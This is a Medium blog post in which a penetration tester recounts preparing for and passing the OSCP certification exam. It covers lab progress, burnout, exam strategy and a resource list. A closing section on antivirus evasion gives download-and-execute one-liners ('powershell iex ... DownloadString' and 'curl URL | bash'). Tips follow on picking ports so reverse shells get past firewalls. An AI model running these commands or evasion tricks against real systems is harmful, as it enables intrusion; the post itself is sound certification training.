Open in app

Sign in

Write

Sign in

OSCP Experience — How I Earned 100 Points in 10 Hours

Jeremyah Joel
10 min readOct 2, 2021

Hi everyone, today I'm going to tell you my story of how I could root all five machines in my OSCP Exam and earn 100 points in just 10 hours! I hope you can get something from here that might be useful for you in your journey!

It wasn't easy, but not hard at all. The only right way to describe the journey is the word "Exciting". To better understand, I am a Computer Science graduate with a Cyber Security Major. I have been involved in cyber defence technology research for two years.

I have a very good understanding of python, c, and bash. These three things played a major success in my blue-team-related thesis about using machine learning to create a fully autonomous web application firewall. If you're interested in one of our research about remote code execution, you can read it here

The Background

1 July 2021 is the start of the journey. My company enrolled me in a 60days PWK Course starting from 11 July 2021. In my case, they did clear my schedule to the point where it feels like a paid leave 😂😂. The only thing I need to do is hack, hack and hack!

The first ten days, while waiting for the PWK Labs, I decided to practice in Hackthebox Lab. I followed Tjnull's OSCP like box and only did the Linux boxes. I plan to familiarise myself with Linux exploitation before the PWK Lab starts; then, I can focus on Windows Exploitation and Buffer Overflow later.

The Methodology

I know about "Try Harder", but I can't click with this methodology when we are in the learning phase. I mean, you don't know what you don't know. When you are stuck with an exploit and don't know how to get things to work, there are two possibilities that you can do:

  1. You keep trying the same exploit over and over again with an angry face and revert the machine over and over again. Smashing your keyboard in the process :)
  2. You reach out to the community/forum/ippsec video or official writeup to understand how the exploit work, why the service is exploitable, how doest the exploit takes place, and you understand the flow.

I solved all of PWK labs and Tjnull's list boxes, and I realize that sometimes we need to use a specific exploit with a very limited resource, even in google. You need help, at least a sanity check, or a good keyword to keep you on the right track.

My methodology is simple, when I encounter a new service that I'm not familiar with and have already spent too much time trying to get the exploit to work without any success, I will visit the forum without hesitation and guilt. Then I make sure that I take good notes so that if I encounter the same service in the future, I can easily apply what I learn. Pivoting and tunnelling can be tricky too! Remember that "You learn something new every day."

The PWK Lab

The Start

This might be the most exciting moment in my life. It feels like heaven when I can finally express my curiosity in 75 different live targets. As I said before, I have already done Tjnull's boxes, and the lab is surprisingly similar to those boxes. The only noticeable difference is that the HTB box got a CTF-feels-like touch and the PWK Lab is feels like a straightforward real-life-scenario.

In my first week, I was able to root 29 boxes🔥🔥. And the second week, I was able to add another 23 to 52 boxes in 2 weeks🔥🔥. My priority is to attack the active directory and dependent machines and skip the hard machines. Slowly but surely, I can feel the fire inside me will light out soon.

The Burnout

At this point, it feels almost impossible to keep on going on. I was stuck in two opposite feelings. First, I felt like I was repeating the same things repeatedly. And it feels like the remaining boxes are very hard and almost impossible to solve.

To deal with this, I decide to take a week-long vacation. I went out with my family, played dota with my friend, stay up all night playing cyberpunk (with netrunner / hacker build for sure!) for the whole week. Whenever I felt guilty for myself, I would watch ippsec videos and keep on my notes going.

If you are in this period, you just need to ask yourself constantly to move forward.

How bad you want it?

The burnout period

The Comeback

In my fourth week, it's enough playing and time to come back for the grind. While doing the ex-exam machine in one of the depts, I have trouble understanding static binary and pivoting. Lucky for me, I found myself a friend from offsec community discord that teaches me the right way to pivot and the power of Nishang Reverse Shell.

The Buffer overflow was a bit hard for me. Luckily, the offsec gave a very clear video explaining how the exploit occurs step by step, so I understand the whole flow of the exploit. After reproducing the win 32 BOF exercises, the BOF machine in the lab was too easy.

In the first month of my lab time, I was able to completely pwned all the boxes in the PWK lab! I felt very happy but also worried about Windows Privilege Escalation as I am not too familiar with windows env (I am a mac user).

The Waiting

After doing all the boxes, I didn't touch any lab anymore. Every day for the next two weeks, I just played Dota and watched ippsec videos. Every time I learn something new, I will add it to my notes.

In this period, I found https://ippsec.rocks/, which is very useful in my exam. I booked for 6 September and later rescheduled it to 3 September.

The Important Points in PWK Lab

If you want to have a good exam experience, I strongly suggest considering all things on this list:

  1. Make sure you solve the big four boxes in the lab without any help. No need to rush. Just do these boxes whenever you feel ready. These boxes will give you lots of new knowledge.
  2. Make sure you rooted every retired exam box. You will know when you see one. These boxes are very different from the lab boxes. You will know why and it will make you know what to expect in the real exam.
  3. Make sure you master your tools. What did you choose? NmapAutomator? AutoRecon? Manual Nmap? Make sure to have familiarity with the result. Try your tools to the retired exam boxes.
  4. Make sure to master your reverse shell and understand how to choose the right port. Exam machine is very tricky and sensitive to port incoming-outgoing rules. Try to test your methodology in the retired exam boxes.
  5. For what it is worth, please don't focus on your public dept as it will only provide you with the basic skills you need. Break into another department, learn how to pivot, and have fun with the real boxes!

The OSCP Exam

My exam starts at 10.00 AM. I woke up at around 9.30 AM and was surprised when I went to my discord channel and saw that all my friends were waiting for me. I have three best friends there. One is an IT GRC Officer, one is Risk Consultant, and one is a colleague. They sent me coffee, gave me motivation, and were always there for the next 10 hours. Whenever I take a break, I would join the discord channel and talk about how we were going to play Dota and Age Of Empire III hard after I passed my exam🙃🙃

This was the first time that someone took the OSCP exam in my class and everyone was very excited even though they are not into offensive security at all 🙃🙃

Fifteen minutes before the exam started, I left the discord channels and proceeded to the verification process. Everything went well, and I got my VPN access exactly at 10.00 AM.

The Strategy

The plan is simple.

  1. Win32 Buffer Overflow (25 Points)
  2. Easy Box (10 Points)
  3. Medium Box (20 Points)
  4. Medium Box (20 Points) — Safe Point
  5. Hard box ( 25 Points)

I use NmapAutomator for the 25 points box to save time. Then I start with my plan.

The Unexpected

Well, the unexpected was going two ways. The first is "Wow, this is too easy" and the second is "The hell is this?". The first is for buffer overflow. After spending around a week learning about buffer overflow methodology, It was a relief when I solved the Buffer Overflow box in just 30 minutes.

I took a break for 30 minutes after being done with Buffer Overflow while waiting for the Nmap to run. I ordered Gojek to deliver some coffee, Shilin, candy, and lunch. I was very excited!!

The next is the 10 points and 20 point box. These two boxes teach me about "Expect the Unexpected" and "Try Harder" methodology 🙃🙃 I keep making small mistakes by underestimating an exploit and choosing random port without any reason. After I applied things that I learned from the retired exam boxes in the lab, I completed these boxes in just two hours.

The boxes are relatively easy but need lots of effort. Debugging, fixing, and downloading new services that I'm not very familiar with to understand better is the way to understand the flow and flaw.

I took a one-hour break to go out with my little sister and pick up some ice cream at McD. Don't forget to relax, and you're free to take as many breaks as you want as long as you ask the proctor politely. Then I started my next box.

I have two mottos to keep me in line with the exploit and sanity check the progress. If it's too hard, I would ask myself, "OSCP is a Foundation course, would it be this far?" and if it looks too straightforward and the exploit didn't work, I would ask myself, "If it is this easy, why the OSCP pass rate is really low? There must be another way".

The next two boxes are relatively exciting. As far as I remember, I didn't use any public exploit to gain shell at all! Purely chaining misconfiguration and taking advantage of open services! This box is very fun and represents a real-life scenario. In around two and a half hours, I've managed to get root on the 20 points box and low-level shell in the 25 point box. I already got 87.5 Points in my pocket and feel safe.

I decided to take another one-hour break, and I contacted my colleagues to inform them that I've got four roots and one low-level shell. They were very excited and congratulated me. My friends in discord were very happy, and they sent me some food. I use this time to take a bath and relax.

The last privilege escalation took me 2 hours in total. It was very exciting to finally use my Web Exploit skill in this advanced CTF-like case. Chaining some vulnerabilities and services, I've managed to get a windows admin account from remote code execution, still in the form of a web shell. I jumped out of my brand-new secret lab chair. My dad was next to me and hugged me when I said, "I got 100 points". I then chatted with the proctor to say, "Heyy, just want to let you know I got 100 points :) I am very happy". As expected, he doesn't care and replies, "Keep up the good work" 🙃🙃.

Even though it was a non-interactive shell, I mastered nishang as my secret weapon and know how to upgrade this shell to a fully interactive one. So I decided to take another 15 minutes short break to let my friends and colleagues know that I got 100 points! I WAS VERY HAPPY!

After the break, I upgraded the web shell to a qualified reverse shell, and It was very easy when I already used nishang in all my windows boxes. In exactly 10 hours. I rooted five machines and got 100points! It took me another hour to reproduce all the exploits and take screenshots for reporting. I stop my exam afterwards.

I played Dota all night and started reporting the next day. Around 7 hours after my submission, I got an email from the offensive security team that I had passed my OSCP Exam!

My Gift

These are the resource that helps me a lot in my lab and exam.

Resources:

  1. Got an RCE in Windows Based system? Nishang Windows Reverse Shell
  2. Already got low-level shell? Linpeas/Winpeas to enumerate and pspy to guess the cronjob.
  3. Don't know how to exploit specific services? Ippsec.rock
  4. Don't know about common website and service exploit? hacktrics
  5. No service is exploitable? Try kernel exploit Linux Exploit Suggester 2 and Metasploit's Local Exploit Suggester for Windows.

Antivirus Evasion Technique

In the lab and exam, you will encounter many machines with built-in antivirus. The files will instantly be removed from the server when you try to download a reverse shell/backdoor payload like nishang or msfvenom generated venom. You can take advantage of in-memory download and execute as shown below.

For Windows, you can use :

powershell iex (New-Object Net.WebClient).DownloadString(‘url’)

And for Linux, you can take advantage of the command chaining operation, in this case, pipe to directly point the raw files to bash

curl URL | bash

Port Choosing Technique

Make sure you understand a way to determine which port to use. If you force a windows server to download files from a random port, the firewall will block it. Aim for common misconfiguration to be taken advantage of. For example, if you want to transfer a file, make sure to host it in 80 or 443. And if you want to make a reverse connection, try port 22. If no port is working, try to aim for port reuse by killing the application in the low-level shell.

I will update this section when I remember another resource I used.

Special Thanks

I am forever thankful to be part of the Vantage Point Security team. All my colleagues are very humble and supportive. I am thankful for my supportive family and friends as well.

Thanks to my friends for the constant support and time invested in me.

Oscp
Hacking
Offensive Security

--

--

Jeremyah Joel

Written by Jeremyah Joel

44 Followers

Product Security at Ministry of Education, Culture, Research, and Technology of Indonesia

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams